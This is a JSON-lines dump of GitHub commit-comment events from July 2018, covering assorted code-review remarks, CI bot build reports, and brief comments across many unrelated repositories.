{"id":"7972550010","type":"CommitCommentEvent","actor":{"login":"CaptainGlac1er"},"repo":{"name":"PHPMailer/PHPMailer"},"payload":{"comment":{"id":29725511,"position":43,"line":1079,"path":"src/SMTP.php","commit_id":"f4d37028af4b2f596847534566344b21d9b48b0d","created_at":"2018-07-16T19:41:21Z","updated_at":"2018-07-16T19:41:21Z","author_association":"NONE","body":"We aren't using even half of that limit. Welp well 5.2-stable works so probably going to go with that then. "}},"created_at":"2018-07-16T19:41:21Z"}
{"id":"7972551695","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29725515,"position":null,"line":null,"path":null,"commit_id":"e131be9e565f4498242c3be3f923fad05ba31997","created_at":"2018-07-16T19:41:42Z","updated_at":"2018-07-16T19:41:42Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/87/display/redirect) (on internal Jenkins) failed in stage 'Test docs' 🔥 : hudson.AbortException: Xamarin.Mac tests on macOS 10.8 failed (xammac_tests)\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/87//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/e131be9e565f4498242c3be3f923fad05ba31997/87/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/e131be9e565f4498242c3be3f923fad05ba31997/87/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/e131be9e565f4498242c3be3f923fad05ba31997/87/jenkins-results/generator-diff/index.html) (please review changes)\n🔥 [Xamarin.Mac tests on macOS 10.8 failed (xammac_tests)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/87/display/redirect) 🔥\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/e131be9e565f4498242c3be3f923fad05ba31997/87/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-16T19:41:42Z"}
{"id":"7972555087","type":"CommitCommentEvent","actor":{"login":"ijustbsd"},"repo":{"name":"ijustbsd/ipt_connect"},"payload":{"comment":{"id":29725526,"position":8,"line":9,"path":"ipt_connect/IPTdev/views.py","commit_id":"2ee47562538f4a24a73a9fdf9962c7390130be5a","created_at":"2018-07-16T19:42:22Z","updated_at":"2018-07-16T19:42:22Z","author_association":"OWNER","body":"We can avoid this in two ways: `from IPTdev.app_settings import *` or `import  IPTdev.app_settings`, but then we will get poorly readable code."}},"created_at":"2018-07-16T19:42:22Z"}
{"id":"7972556211","type":"CommitCommentEvent","actor":{"login":"3pwo0d"},"repo":{"name":"3pwo0d/verstka"},"payload":{"comment":{"id":29725534,"position":null,"line":null,"path":null,"commit_id":"2c5f0267ebaac410ddf53eaccdd8e16cef1fcca2","created_at":"2018-07-16T19:42:37Z","updated_at":"2018-07-16T19:42:37Z","author_association":"OWNER","body":"dfdfdfdfdfdf"}},"created_at":"2018-07-16T19:42:37Z"}
{"id":"7972560651","type":"CommitCommentEvent","actor":{"login":"r4co0n"},"repo":{"name":"pachulo/nextcloud-snap"},"payload":{"comment":{"id":29725546,"position":4,"line":192,"path":"snap/snapcraft.yaml","commit_id":"8c7f23cc83a715fa2b55ba773d559af71ed78256","created_at":"2018-07-16T19:43:31Z","updated_at":"2018-07-16T19:43:31Z","author_association":"NONE","body":"Looking at the comment in line 189, I think this should be listed as first stage package."}},"created_at":"2018-07-16T19:43:31Z"}
{"id":"7972563036","type":"CommitCommentEvent","actor":{"login":"diegomfg"},"repo":{"name":"diegomfg/test1"},"payload":{"comment":{"id":29725554,"position":null,"line":null,"path":null,"commit_id":"e65aa239fd36fc4b3edd890567f5761fa4843498","created_at":"2018-07-16T19:43:59Z","updated_at":"2018-07-16T19:43:59Z","author_association":"OWNER","body":"Delete test project"}},"created_at":"2018-07-16T19:43:59Z"}
{"id":"7972564218","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29725564,"position":null,"line":null,"path":null,"commit_id":"976aedbac1aee6e8c51334d9cb86043966d1668f","created_at":"2018-07-16T19:44:13Z","updated_at":"2018-07-16T19:44:13Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-385](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-385).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-385-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-16T19:44:13Z"}
{"id":"7972566867","type":"CommitCommentEvent","actor":{"login":"katmratliff"},"repo":{"name":"katmratliff/pyswmm"},"payload":{"comment":{"id":29725580,"position":null,"line":null,"path":null,"commit_id":"aa1178e7950037b7c35e1bd5560790ff1293cc1e","created_at":"2018-07-16T19:44:47Z","updated_at":"2018-07-16T19:44:47Z","author_association":"OWNER","body":"free array not working yet."}},"created_at":"2018-07-16T19:44:47Z"}
{"id":"7972567810","type":"CommitCommentEvent","actor":{"login":"Medo2l7alabe"},"repo":{"name":"Medo2l7alabe/M2"},"payload":{"comment":{"id":29725582,"position":4,"line":28,"path":"README.md","commit_id":"70179e5be75043fae66463f9df82b7d1f7384497","created_at":"2018-07-16T19:44:59Z","updated_at":"2018-07-16T19:44:59Z","author_association":"OWNER","body":"![my script](https://user-images.githubusercontent.com/39675437/42779660-b7dee526-8949-11e8-924d-e940e1f566ab.png)\r\n![my script 2](https://user-images.githubusercontent.com/39675437/42779686-cf8b3bca-8949-11e8-9f6c-38f5bfe0bf07.png)\r\n"}},"created_at":"2018-07-16T19:44:59Z"}
{"id":"7972575507","type":"CommitCommentEvent","actor":{"login":"shorea"},"repo":{"name":"aws/aws-sdk-java"},"payload":{"comment":{"id":29725604,"position":5,"line":175,"path":"aws-java-sdk-s3/src/main/java/com/amazonaws/services/s3/internal/S3AbortableInputStream.java","commit_id":"f2a5b6414660a387a276d769efd074831535f817","created_at":"2018-07-16T19:46:29Z","updated_at":"2018-07-16T19:46:29Z","author_association":"CONTRIBUTOR","body":"@fernomac sorry about that, must have missed this when copying over. Will be included in next release."}},"created_at":"2018-07-16T19:46:29Z"}
{"id":"7972585090","type":"CommitCommentEvent","actor":{"login":"kait-schorr"},"repo":{"name":"omoniyi21/back-end-project-week"},"payload":{"comment":{"id":29725620,"position":null,"line":null,"path":null,"commit_id":"f29f07c85e81b66507dc2c0c1f2ca4e0626b3ad9","created_at":"2018-07-16T19:48:32Z","updated_at":"2018-07-16T19:48:32Z","author_association":"NONE","body":"Awesome job making an initial commit early! To keep your github a littler cleaner, try to remember to add node_modules to your git ignore file when making a new project. "}},"created_at":"2018-07-16T19:48:32Z"}
{"id":"7972587212","type":"CommitCommentEvent","actor":{"login":"nicholasjhorton"},"repo":{"name":"Amherst-Statistics/IS5inR"},"payload":{"comment":{"id":29725622,"position":null,"line":null,"path":null,"commit_id":"8e0c452e0c7fc5886047d24802e7c0e7bf56399c","created_at":"2018-07-16T19:49:00Z","updated_at":"2018-07-16T19:49:00Z","author_association":"CONTRIBUTOR","body":"What was the error message?\n\nAll the best,\n\nNick\n\n> On Jul 16, 2018, at 11:16 AM, Margaret Chien <notifications@github.com> wrote:\n> \n> I got an error after I pushed. Not sure if it means anything, but wanted to make note of it.\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-16T19:49:00Z"}
{"id":"7972594182","type":"CommitCommentEvent","actor":{"login":"Kalebn0"},"repo":{"name":"donnemartin/system-design-primer"},"payload":{"comment":{"id":29725635,"position":null,"line":null,"path":null,"commit_id":"90600559bd9aa73cd4b94b8dd9c6fcbc12d0b590","created_at":"2018-07-16T19:50:28Z","updated_at":"2018-07-16T19:50:28Z","author_association":"NONE","body":"Thank you"}},"created_at":"2018-07-16T19:50:28Z"}
{"id":"7972595069","type":"CommitCommentEvent","actor":{"login":"ijustbsd"},"repo":{"name":"ijustbsd/ipt_connect"},"payload":{"comment":{"id":29725637,"position":17,"line":29,"path":"ipt_connect/IPTdev/views.py","commit_id":"2ee47562538f4a24a73a9fdf9962c7390130be5a","created_at":"2018-07-16T19:50:38Z","updated_at":"2018-07-16T19:50:38Z","author_association":"OWNER","body":"The `name` variable is used by \"head.html\" template. We should pass it to each templates that include \"head.html\"."}},"created_at":"2018-07-16T19:50:38Z"}
{"id":"7972601112","type":"CommitCommentEvent","actor":{"login":"Blaccbart"},"repo":{"name":"CompleteBlenderCreator/01-Introduction-And-Setup"},"payload":{"comment":{"id":29725645,"position":null,"line":null,"path":null,"commit_id":"06130d268e8c6f33cd3bd8379e1cb4ff21595b31","created_at":"2018-07-16T19:51:50Z","updated_at":"2018-07-16T19:51:50Z","author_association":"NONE","body":"Hi everyone, just getting started on the Blender course."}},"created_at":"2018-07-16T19:51:50Z"}
{"id":"7972603987","type":"CommitCommentEvent","actor":{"login":"sellout"},"repo":{"name":"FormationAI/dhall-bhat"},"payload":{"comment":{"id":29725652,"position":15,"line":15,"path":"Compose/Functor","commit_id":"25415ac149893a8652b0ac958862a01b9a2baad2","created_at":"2018-07-16T19:52:25Z","updated_at":"2018-07-16T19:52:25Z","author_association":"CONTRIBUTOR","body":"replace this line with `(gFunctor.map a b k)`"}},"created_at":"2018-07-16T19:52:25Z"}
{"id":"7972604217","type":"CommitCommentEvent","actor":{"login":"rjachimek"},"repo":{"name":"rjachimek/Rjachimek_Manager"},"payload":{"comment":{"id":29725653,"position":null,"line":null,"path":null,"commit_id":"94a078c59c02425807edb60874333e547371df69","created_at":"2018-07-16T19:52:28Z","updated_at":"2018-07-16T19:52:28Z","author_association":"OWNER","body":"@pwasilewski-netcode"}},"created_at":"2018-07-16T19:52:28Z"}
{"id":"7972605139","type":"CommitCommentEvent","actor":{"login":"kait-schorr"},"repo":{"name":"omoniyi21/back-end-project-week"},"payload":{"comment":{"id":29725655,"position":null,"line":null,"path":null,"commit_id":"d521e99551c4236a1d3b241c5f71eb189818b30d","created_at":"2018-07-16T19:52:40Z","updated_at":"2018-07-16T19:52:40Z","author_association":"NONE","body":"Excellent job on your Schema!"}},"created_at":"2018-07-16T19:52:40Z"}
{"id":"7972605886","type":"CommitCommentEvent","actor":{"login":"sellout"},"repo":{"name":"FormationAI/dhall-bhat"},"payload":{"comment":{"id":29725656,"position":17,"line":17,"path":"Compose/Foldable","commit_id":"25415ac149893a8652b0ac958862a01b9a2baad2","created_at":"2018-07-16T19:52:49Z","updated_at":"2018-07-16T19:52:49Z","author_association":"CONTRIBUTOR","body":"replace this line with `(λ(ga : g a) → gFoldable.fold a ga b k)`"}},"created_at":"2018-07-16T19:52:49Z"}
{"id":"7972606991","type":"CommitCommentEvent","actor":{"login":"sellout"},"repo":{"name":"FormationAI/dhall-bhat"},"payload":{"comment":{"id":29725659,"position":23,"line":23,"path":"Compose/Applicative","commit_id":"25415ac149893a8652b0ac958862a01b9a2baad2","created_at":"2018-07-16T19:53:04Z","updated_at":"2018-07-16T19:53:04Z","author_association":"CONTRIBUTOR","body":"There’s a few more like that …"}},"created_at":"2018-07-16T19:53:04Z"}
{"id":"7972615477","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29725673,"position":null,"line":null,"path":null,"commit_id":"f4007bfddd54d1a4421e157dc1f7c3405aa282e4","created_at":"2018-07-16T19:54:53Z","updated_at":"2018-07-16T19:54:53Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180716-195452 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180716-195452\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-16T19:54:53Z"}
{"id":"7972618202","type":"CommitCommentEvent","actor":{"login":"wolfenste"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29725678,"position":15,"line":15,"path":"tests/TicTacToeTest.php","commit_id":"3ffac1b54136046406dd307d484db49ba64d8037","created_at":"2018-07-16T19:55:28Z","updated_at":"2018-07-16T19:55:28Z","author_association":"OWNER","body":"We have just one player at a time. The rest resides in config data. At each turn one player is instantiated."}},"created_at":"2018-07-16T19:55:28Z"}
{"id":"7972623853","type":"CommitCommentEvent","actor":{"login":"Kalebn0"},"repo":{"name":"divyum/system-design-primer"},"payload":{"comment":{"id":29725689,"position":3,"line":3,"path":"gitbook/SUMMARY.md","commit_id":"a735b006656308da2a6f75eba55f8a9bcfc08313","created_at":"2018-07-16T19:56:37Z","updated_at":"2018-07-16T19:56:37Z","author_association":"NONE","body":"Yes"}},"created_at":"2018-07-16T19:56:37Z"}
{"id":"7972625407","type":"CommitCommentEvent","actor":{"login":"aledjones"},"repo":{"name":"aledjones/db-rest"},"payload":{"comment":{"id":29725692,"position":17,"line":32,"path":"readme.md","commit_id":"5d445e9a4e96c8773a83ce3e5e2feb3be580fee9","created_at":"2018-07-16T19:56:57Z","updated_at":"2018-07-16T19:56:57Z","author_association":"OWNER","body":"Nice! 👍🏻\r\n\r\nI will test and apply it to production. \r\nIf something is off I‘ll let you now. \r\n\r\n> Am 16.07.2018 um 20:55 schrieb Jannis Redmann <notifications@github.com>:\r\n> \r\n> I have just pushed an updated Dockerfile based on node:alpine and set up automated builds. You should be able to use the derhuerst/db-rest docker image from now on. (Please let me know if it doesn't work.)\r\n> \r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub, or mute the thread.\r\n"}},"created_at":"2018-07-16T19:56:57Z"}
{"id":"7972625634","type":"CommitCommentEvent","actor":{"login":"twobackfromtheend"},"repo":{"name":"SaltieRL/ReplayAnalysis"},"payload":{"comment":{"id":29725694,"position":16,"line":36,"path":"game/actor_parsing.py","commit_id":"c13981cff915ada77170be035564025ba69804af","created_at":"2018-07-16T19:56:59Z","updated_at":"2018-07-16T19:56:59Z","author_association":"CONTRIBUTOR","body":"wait has this been fixed - i see a \"fix ball rotation\" commit that adds a value key c6c610d32b9abc1da1187538e8d00c681aac2781"}},"created_at":"2018-07-16T19:56:59Z"}
{"id":"7972627013","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"Ad1n/Black_Jack"},"payload":{"comment":{"id":29725700,"position":13,"line":10,"path":"card.rb","commit_id":"343a2f37593fa76d96d6a0b790d492908abb15cb","created_at":"2018-07-16T19:57:16Z","updated_at":"2018-07-16T19:57:16Z","author_association":"NONE","body":"зачем их складывать? по отдельности и хранить можно\r\n(и не будет потом не явных card[0] / card[1])"}},"created_at":"2018-07-16T19:57:16Z"}
{"id":"7972627188","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/front-end-project-week"},"payload":{"comment":{"id":29725701,"position":null,"line":null,"path":null,"commit_id":"9624af8a5a9623094f8bc5e62bc9c9d17fa6f446","created_at":"2018-07-16T19:57:18Z","updated_at":"2018-07-16T19:57:18Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create a note with a title and content](https://trello.com/c/pwl1GjJh/2-create-a-note-with-a-title-and-content)"}},"created_at":"2018-07-16T19:57:18Z"}
{"id":"7972633842","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"Ad1n/Black_Jack"},"payload":{"comment":{"id":29725710,"position":22,"line":17,"path":"game.rb","commit_id":"343a2f37593fa76d96d6a0b790d492908abb15cb","created_at":"2018-07-16T19:58:43Z","updated_at":"2018-07-16T19:58:43Z","author_association":"NONE","body":"Лучше интерфейс передавать в initialize из main"}},"created_at":"2018-07-16T19:58:43Z"}
{"id":"7972637623","type":"CommitCommentEvent","actor":{"login":"joviane"},"repo":{"name":"alexfelipe/teste-android-mock"},"payload":{"comment":{"id":29725714,"position":4,"line":14,"path":"app/src/main/java/br/com/alura/leilao/model/Leilao.java","commit_id":"00b774b41ec304ba5954ef88719d7dbf0dfb2055","created_at":"2018-07-16T19:59:30Z","updated_at":"2018-07-16T19:59:30Z","author_association":"NONE","body":"Lembra da diferença entre usar o wrapper e o primitivo. Wrapper quando você quer diferenciar 0 de null geralmente. No seu caso pelo que conversamos pode ser primitivo mesmo (tanto aqui quanto nos outros lugares)\r\n"}},"created_at":"2018-07-16T19:59:30Z"}
{"id":"7972639967","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29725719,"position":null,"line":null,"path":null,"commit_id":"143098afb1c1d4805e1c74061b19eb8c3fe7ed34","created_at":"2018-07-16T19:59:57Z","updated_at":"2018-07-16T19:59:57Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Make the sidebar](https://trello.com/c/i537eXfM/14-make-the-sidebar)"}},"created_at":"2018-07-16T19:59:57Z"}
{"id":"7968333065","type":"CommitCommentEvent","actor":{"login":"kingsman1234"},"repo":{"name":"kingsman1234/myproject"},"payload":{"comment":{"id":29715118,"position":null,"line":null,"path":null,"commit_id":"35484681c93a075f6af10c7651c060cf9cf40da0","created_at":"2018-07-16T02:00:15Z","updated_at":"2018-07-16T02:00:15Z","author_association":"OWNER","body":"Well , It doesn't make sense ~!\r\nWhy you modify this scripts ?"}},"created_at":"2018-07-16T02:00:15Z"}
{"id":"7968333717","type":"CommitCommentEvent","actor":{"login":"FndNur1Labs"},"repo":{"name":"seredat/karbowanec"},"payload":{"comment":{"id":29715123,"position":null,"line":null,"path":null,"commit_id":"47579f988c20f5b93a7caf2c5bde24e569d45562","created_at":"2018-07-16T02:00:32Z","updated_at":"2018-07-16T02:00:32Z","author_association":"NONE","body":"nice fixed guys keep up. i keep watch if some trouble :+1: "}},"created_at":"2018-07-16T02:00:32Z"}
{"id":"7968333831","type":"CommitCommentEvent","actor":{"login":"jradwan"},"repo":{"name":"jradwan/TiVoToGo.bundle"},"payload":{"comment":{"id":29715124,"position":null,"line":null,"path":null,"commit_id":"62a82eee61cc16e8f296a86e5bc7a9e3d4da948f","created_at":"2018-07-16T02:00:36Z","updated_at":"2018-07-16T02:00:36Z","author_association":"OWNER","body":"Closes #3."}},"created_at":"2018-07-16T02:00:36Z"}
{"id":"7968337627","type":"CommitCommentEvent","actor":{"login":"leo424y"},"repo":{"name":"twgo/siann1-hak8_boo5-hing5"},"payload":{"comment":{"id":29715126,"position":68,"line":68,"path":"util/data/perturb_data_dir_encode.sh","commit_id":"347309234195802922422825fa36fead7ed167a7","created_at":"2018-07-16T02:02:36Z","updated_at":"2018-07-16T02:02:36Z","author_association":"CONTRIBUTOR","body":"已修正為    sed -z \"s/\\n/avconv -i - -f $factor -ar 8000 - | avconv -f $factor -ar 8000 -i - -f wav -ar 8000 - |\\n/g\" $srcdir/wav.scp $destdir/wav.scp\r\n"}},"created_at":"2018-07-16T02:02:36Z"}
{"id":"7968342827","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29715132,"position":null,"line":null,"path":null,"commit_id":"2faef250227e996895aacca5fa62e90d17602a7a","created_at":"2018-07-16T02:05:33Z","updated_at":"2018-07-16T02:05:33Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2322 of 2322 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.21%25-green.png)</a>\n"}},"created_at":"2018-07-16T02:05:33Z"}
{"id":"7968345518","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29715136,"position":null,"line":null,"path":null,"commit_id":"2faef250227e996895aacca5fa62e90d17602a7a","created_at":"2018-07-16T02:06:59Z","updated_at":"2018-07-16T02:06:59Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-16T02:06:59Z"}
{"id":"7968348024","type":"CommitCommentEvent","actor":{"login":"marh16"},"repo":{"name":"MccreeFei/EasyChat"},"payload":{"comment":{"id":29715137,"position":null,"line":null,"path":null,"commit_id":"944f05fb9175069ab7f07c9ae6af1f68d5ba8735","created_at":"2018-07-16T02:08:21Z","updated_at":"2018-07-16T02:08:21Z","author_association":"NONE","body":"wyu"}},"created_at":"2018-07-16T02:08:21Z"}
{"id":"7968349241","type":"CommitCommentEvent","actor":{"login":"firstvirtue"},"repo":{"name":"firstvirtue/blog"},"payload":{"comment":{"id":29715140,"position":null,"line":null,"path":null,"commit_id":"b8544ad3a664234252816343a63c9b117a5898df","created_at":"2018-07-16T02:09:04Z","updated_at":"2018-07-16T02:09:04Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-16T02:09:04Z"}
{"id":"7968350418","type":"CommitCommentEvent","actor":{"login":"firstvirtue"},"repo":{"name":"firstvirtue/blog"},"payload":{"comment":{"id":29715141,"position":null,"line":null,"path":null,"commit_id":"b8544ad3a664234252816343a63c9b117a5898df","created_at":"2018-07-16T02:09:43Z","updated_at":"2018-07-16T02:09:43Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-16T02:09:43Z"}
{"id":"7968350731","type":"CommitCommentEvent","actor":{"login":"xuanbinhboong"},"repo":{"name":"xuanbinhboong/Scala"},"payload":{"comment":{"id":29715142,"position":null,"line":null,"path":null,"commit_id":"5544b97aeda23d1a00a3fa5f6c9f363c4319152b","created_at":"2018-07-16T02:09:53Z","updated_at":"2018-07-16T02:09:53Z","author_association":"OWNER","body":"$ git config --global user.name \"BinhBoong\"\r\n$ git config --global user.email \"binhvtxgch15059@fpt.edu.vn\""}},"created_at":"2018-07-16T02:09:53Z"}
{"id":"7968351560","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29715143,"position":null,"line":null,"path":null,"commit_id":"43eb23a64a010bfd0efe5084b9791d7be4d4e12e","created_at":"2018-07-16T02:10:20Z","updated_at":"2018-07-16T02:10:20Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.227`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/227) :tada:"}},"created_at":"2018-07-16T02:10:20Z"}
{"id":"7968353809","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29715148,"position":null,"line":null,"path":null,"commit_id":"43eb23a64a010bfd0efe5084b9791d7be4d4e12e","created_at":"2018-07-16T02:11:36Z","updated_at":"2018-07-16T02:11:36Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.344`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/404271060) :tada:"}},"created_at":"2018-07-16T02:11:36Z"}
{"id":"7968355086","type":"CommitCommentEvent","actor":{"login":"mediocremn"},"repo":{"name":"mediocremn/RGB-Hex-Converter"},"payload":{"comment":{"id":29715151,"position":null,"line":null,"path":null,"commit_id":"e5d353788985bdd337c7fc867ca97de59f7efc5c","created_at":"2018-07-16T02:12:20Z","updated_at":"2018-07-16T02:12:20Z","author_association":"OWNER","body":"This website converts RGB to Hex & vice versa."}},"created_at":"2018-07-16T02:12:20Z"}
{"id":"7968357561","type":"CommitCommentEvent","actor":{"login":"xuanbinhboong"},"repo":{"name":"xuanbinhboong/Scala"},"payload":{"comment":{"id":29715152,"position":null,"line":null,"path":null,"commit_id":"5544b97aeda23d1a00a3fa5f6c9f363c4319152b","created_at":"2018-07-16T02:13:42Z","updated_at":"2018-07-16T02:13:42Z","author_association":"OWNER","body":" $ git clone https://github.com/xuanbinhboong/Scala.git"}},"created_at":"2018-07-16T02:13:42Z"}
{"id":"7968365100","type":"CommitCommentEvent","actor":{"login":"MissMukmuk"},"repo":{"name":"MissMukmuk/studentManager_19"},"payload":{"comment":{"id":29715159,"position":null,"line":null,"path":null,"commit_id":"791699a1489d872d02487ec743e5345e8c1c6e74","created_at":"2018-07-16T02:17:53Z","updated_at":"2018-07-16T02:17:53Z","author_association":"OWNER","body":"学生管理档案"}},"created_at":"2018-07-16T02:17:53Z"}
{"id":"7968373566","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"matthewbauer/nixpkgs"},"payload":{"comment":{"id":29715168,"position":null,"line":null,"path":null,"commit_id":"3f164a1de6f53cc1bcaa5164c3f5452ede09d1f9","created_at":"2018-07-16T02:22:35Z","updated_at":"2018-07-16T02:22:35Z","author_association":"OWNER","body":"Ok makes sense. I think we will also need to readd nixpkgsFunc because that is needed to do \"forceSystem\" properly (and most likely what you would want instead). Without nixpkgsFunc the only way to do this would be through something like ```--argstr system ...```. /cc @ericson2314"}},"created_at":"2018-07-16T02:22:35Z"}
{"id":"7968387688","type":"CommitCommentEvent","actor":{"login":"ZeGentzy"},"repo":{"name":"gfx-rs/gfx"},"payload":{"comment":{"id":29715183,"position":10,"line":27,"path":"src/backend/auxil/range_alloc.rs","commit_id":"1f9b40e4be0efe00fd1ebaed19f096b8831e68ea","created_at":"2018-07-16T02:30:23Z","updated_at":"2018-07-16T02:30:23Z","author_association":"CONTRIBUTOR","body":"In which case will `2n = n` (other than `n = 0`)? Can't we assert that length != 0?I just tested every possible n for `uint8_t`, `int8_t`, `uint16_t`, `int16_t`, `uint32_t` and `int32_t` and I don't see any other case.\r\n```cpp\r\n#include <cstdio>\r\n#include <limits>\r\n#include <cstdint>\r\n\r\nint main()\r\n{\r\n    using i_t = int16_t;\r\n\r\n    auto min = std::numeric_limits<i_t>::min();\r\n    auto max = std::numeric_limits<i_t>::max();\r\n    \r\n    for(i_t i = min; i < max; ++i) {\r\n        if (i == (i + i))\r\n            printf(\"i %i (%i, %i) \\n\", i, min, max);   \r\n    }\r\n}\r\n```"}},"created_at":"2018-07-16T02:30:23Z"}
{"id":"7968393797","type":"CommitCommentEvent","actor":{"login":"setcode"},"repo":{"name":"setcode/airstereo.github.io"},"payload":{"comment":{"id":29715192,"position":null,"line":null,"path":null,"commit_id":"c4a2447bbd8bf79ce288d77acabd1ac370fa3c50","created_at":"2018-07-16T02:33:40Z","updated_at":"2018-07-16T02:33:40Z","author_association":"OWNER","body":"Deleted files..."}},"created_at":"2018-07-16T02:33:40Z"}
{"id":"7968395265","type":"CommitCommentEvent","actor":{"login":"RAHMAMF"},"repo":{"name":"RAHMAMF/ProjectuasGMR"},"payload":{"comment":{"id":29715195,"position":null,"line":null,"path":null,"commit_id":"28b2fc635be360c593c957db2c2c4e8f30cfe605","created_at":"2018-07-16T02:34:28Z","updated_at":"2018-07-16T02:34:28Z","author_association":"OWNER","body":"ini yang rahma edit ya gin :d, imeng :v"}},"created_at":"2018-07-16T02:34:28Z"}
{"id":"7968397202","type":"CommitCommentEvent","actor":{"login":"setcode"},"repo":{"name":"setcode/airstereo.github.io"},"payload":{"comment":{"id":29715197,"position":null,"line":null,"path":null,"commit_id":"c4a2447bbd8bf79ce288d77acabd1ac370fa3c50","created_at":"2018-07-16T02:35:30Z","updated_at":"2018-07-16T02:35:30Z","author_association":"OWNER","body":"Done"}},"created_at":"2018-07-16T02:35:30Z"}
{"id":"7968401274","type":"CommitCommentEvent","actor":{"login":"c0mputer-junkie"},"repo":{"name":"c0mputer-junkie/sub-house"},"payload":{"comment":{"id":29715199,"position":null,"line":null,"path":null,"commit_id":"a66b278534a4c60fd75c014bb764867425c97f71","created_at":"2018-07-16T02:37:50Z","updated_at":"2018-07-16T02:37:50Z","author_association":"OWNER","body":"<img width=\"1325\" alt=\"screen shot 2018-07-15 at 7 35 54 pm\" src=\"https://user-images.githubusercontent.com/16566442/42741369-75ebf28c-8866-11e8-9b9e-ffa95c97534a.png\">\r\n"}},"created_at":"2018-07-16T02:37:50Z"}
